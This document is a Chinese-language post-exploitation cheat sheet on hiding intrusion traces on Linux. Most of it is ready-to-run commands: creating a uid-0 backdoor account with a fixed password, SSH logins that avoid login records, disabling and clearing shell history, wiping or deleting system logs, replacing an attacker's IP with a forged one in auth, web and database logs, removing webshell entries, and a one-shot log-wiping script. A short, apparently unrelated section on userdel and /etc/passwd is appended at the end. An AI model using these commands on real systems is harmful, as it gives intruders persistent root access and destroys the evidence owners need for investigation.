后渗透基础：Linux篇

入侵痕迹隐藏

后门帐号

添加账号test1，设置uid为0，密码为123456

useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root  -s /bin/bash -d /home/test1

SSH隐身登录

隐身登录系统，不会被last who w等指令检测到,隐藏ssh登录，登录时不分配伪终端，不会记录在utmp、wtmp、btmp中，不会被w、who、users、last、lastb命令发现

ssh -T username@host /bin/bash -i

ssh -o UserKnownHostsFile=/dev/null -T user@host 
/bin/bash -if

隐藏历史操作命令

拿到shell以后，开始无痕模式，禁用命令历史记录功能。

set +o history

恢复

set -o history

history

删除自己的历史命令

删除指定的历史记录，删除100行以后的操作命令

sed -i "100,$d" .bash_history

清理history痕迹

history -c  # 删除内存中的所有命令历史
history -r  # 删除当前会话历史记录

查看登录日志命令

last
#列出截止目前登录过系统的用户信息
#文件位置：
#/var/log/wtmp
lastlog
#记录最后用户登陆信息
#文件位置
#/var/log/lastlog
lastb
#列出失败登录日志
#文件位置
#/var/log/btmp

上述二者都是以二进制形式储存

如果曾尝试过登录却失败，记得删除失败登录日志

系统日志：

Linux 系统存在多种日志文件，来记录系统运行过程中产生的日志。

/var/run/utmp 记录现在登入的用户，使用w,who,users等命令查看
/var/log/wtmp 记录用户所有的登入和登出，使用last命令查看
/var/log/lastlog 记录每一个用户最后登入时间，使用lastlog命令查看
/var/log/btmp 记录所有登录失败信息，使用lastb命令查看
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息

清空日志文件

cat /dev/null > filename
echo "" > filename
echo > filename
: > filename
> filename

删除所有日志

sudo rm -r /var/log/*

替换/删除部分日志

替换我的IP

# 192.168.100.101为攻击者IP，10.0.0.55为伪造IP，-i编辑文件
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/btmp*
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/lastlog
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/wtmp
sed 's/192.168.100.101/10.0.0.55/g' -i secure
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/utmp

删除

# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip
sed  -i '/自己的ip/'d  /var/log/messages
sed  -i '/当天日期/'d  filename

清理web服务日志

web日志：

上传webshell的时候，会在web日志中留下记录

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/access.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/error_log

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_error.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_slow.log

sed 's/192.168.100.101/192.168.1.4/g' –i /var/log/apache/php_error.log

其他

清除日志中含有相关信息的内容：

# 使用grep -v来把我们的相关信息删除
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
# 把修改过的日志覆盖到原日志文件
cat tmp.log > /var/log/nginx/access.log/

一键清除history和系统日志脚本

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

其他

4.userdel命令

(1)删除用户

命令：userdel hangzhou

解析：删除用户。

(2)删除用户包括home目录

命令：userdel -r hangzhou

解析：删除用户，删除对应home目录。

5.查看用户和密码

(1)查看group文件

查看用户组：cat /etc/group | grep hangzhou

解析：使用cat和grep查看已经创建的用户组。

(2)查看passwd文件

查看用户和密码：cat /etc/passwd

查看用户和密码：cat /etc/passwd | grep xihu

解析：使用cat和grep查看已经创建的用户组。